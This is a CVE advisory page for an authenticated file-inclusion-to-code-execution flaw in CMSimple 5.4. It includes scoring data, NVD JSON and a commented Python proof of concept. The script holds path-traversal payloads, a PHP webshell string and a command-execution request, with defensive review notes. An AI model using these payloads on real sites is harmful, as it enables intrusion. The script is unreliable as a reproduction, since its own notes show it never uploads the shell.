Security Vulnerability Report
CVE-2021-47734 CVSS 7.8 HIGH

CVE-2021-47734

Published: 2025-12-23 20:15:45
Last Modified: 2026-01-05 14:15:51

Description

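CMSimple 5.4 contains an authenticated local file inclusion vulnerability that allows remote attackers to manipulate PHP session files and execute arbitrary code. Attackers can leverage the vulnerability by changing the functions file path and uploading malicious PHP code through session file upload mechanisms. Note on scoring: the CVSS 3.1 vector shown below rates the issue as local with low privileges (AV:L/PR:L), whereas the CVSS 4.0 entry in the raw JSON rates it as network-reachable with high privileges (AV:N/PR:H, base score 8.6). Only the latter matches the "remote" and "authenticated" wording of this description, so triage should not rely on the 7.8 local score alone.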

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:cmsimple:cmsimple:5.4:*:*:*:*:*:*:* - VULNERABLE
CMSimple 5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import re  # NOTE(review): imported but never used anywhere in this listing

# CVE-2021-47734 PoC - CMSimple 5.4 Authenticated LFI to RCE
# Target: CMSimple 5.4
# Requirements: Valid admin credentials
#
# NOTE(review): this listing is an illustration of the request sequence, not a
# verified reproduction. The parameter names (`_loginaction`, `_sn`, `_action`)
# and the session-file path are taken from this page only and are not confirmed
# here against the CMSimple source or the Exploit-DB entry the page references.
#
# Defender's reading of the listing:
#   * Every step needs an authenticated session, which matches the
#     "authenticated" wording of the advisory; strong admin credentials and
#     restricted access to the admin login reduce exposure.
#   * The requests carry a path-traversal sequence ("../") and a PHP session
#     file name ("sess_...") in a query parameter, and later a `cmd=` query
#     parameter. All of that lands in web-server access logs, so those
#     strings are the things to search for or alert on.
#   * The weakness class recorded on the page is CWE-98 (include path
#     controlled by request data). The general mitigation is to resolve any
#     configurable include path against a fixed allowlist and to constrain
#     what PHP may open (e.g. `open_basedir`) so session storage cannot be
#     reached as an include target. The page names no fixed release.

# Placeholder target and credentials; the values below are literals in the listing.
TARGET_URL = "http://target.com/cmsimple/"
USERNAME = "admin"
PASSWORD = "admin123"

# One shared session so cookies set by the login response are sent on later requests.
session = requests.Session()


# Step 1: Login to get authenticated session
def login() -> bool:
    """POST the configured credentials to the login URL and report success.

    Returns:
        True when the response body contains "logged_in" or the HTTP status
        is 200, otherwise False.

    NOTE(review): because of the `or status_code == 200` clause, any 200
    response counts as success, so a True result does not by itself show that
    authentication happened.
    """
    login_url = TARGET_URL + "?_loginaction=login"
    data = {
        "userid": USERNAME,
        "password": PASSWORD
    }
    response = session.post(login_url, data=data)
    return "logged_in" in response.text or response.status_code == 200


# Step 2: Upload malicious PHP code to session file
def upload_shell() -> str:
    """Send one GET request whose `_sn` parameter points at a session-file path.

    Returns:
        The body text of that GET response.

    NOTE(review): despite the name, nothing is uploaded here. `upload_url`,
    `shell_code` and `include_url` are assigned but never used; the only
    network call is the GET with `exploit_params`.
    """
    # Find the file inclusion parameter
    upload_url = TARGET_URL + "?_sn=functions&_action=edit"  # unused below

    # Inject PHP webshell via file path manipulation
    # (string is only assigned; this function never transmits it)
    shell_code = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"

    # Step 3: Manipulate file path to include session file
    include_url = TARGET_URL + "?_sn=/tmp/sess_PHPSESSID"  # unused below

    # Alternatively, use the vulnerable parameter directly
    # The "../" sequences and "sess_" file name in `_sn` are the pattern a
    # log search or request filter would match on.
    exploit_params = {
        "_sn": "../../../tmp/sess_PHPSESSID",
        "_action": "include"
    }

    response = session.get(TARGET_URL, params=exploit_params)
    return response.text


# Step 4: Execute commands via webshell
def exec_command(cmd: str) -> str:
    """Issue a GET with the session-file path in `_sn` and `cmd` in the query string.

    Args:
        cmd: text appended verbatim (no URL encoding) after "&cmd=".

    Returns:
        The body text of the response.

    Because the value travels in the query string of a GET request, it is
    visible in access logs and to any inspecting proxy.
    """
    shell_url = TARGET_URL + "?_sn=../../../tmp/sess_PHPSESSID&cmd=" + cmd
    response = session.get(shell_url)
    return response.text


if __name__ == "__main__":
    # Script flow: log in, call upload_shell(), then request a single
    # "whoami" and print whatever body comes back.
    if login():
        print("[+] Login successful")
        print("[*] Uploading shell...")
        upload_shell()
        print("[*] Executing command: whoami")
        result = exec_command("whoami")
        print(f"[+] Result: {result}")
    else:
        print("[-] Login failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47734", "sourceIdentifier": "[email protected]", "published": "2025-12-23T20:15:45.123", "lastModified": "2026-01-05T14:15:51.477", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "CMSimple 5.4 contains an authenticated local file inclusion vulnerability that allows remote attackers to manipulate PHP session files and execute arbitrary code. Attackers can leverage the vulnerability by changing the functions file path and uploading malicious PHP code through session file upload mechanisms."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cmsimple:cmsimple:5.4:*:*:*:*:*:*:*", "matchCriteriaId": "7AE7406C-886F-4F06-B668-90EB220AFA5C"}]}]}], "references": [{"url": "https://www.cmsimple.org/en/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50547", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/cmsimple-authenticated-local-file-inclusion-remote-code-execution", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}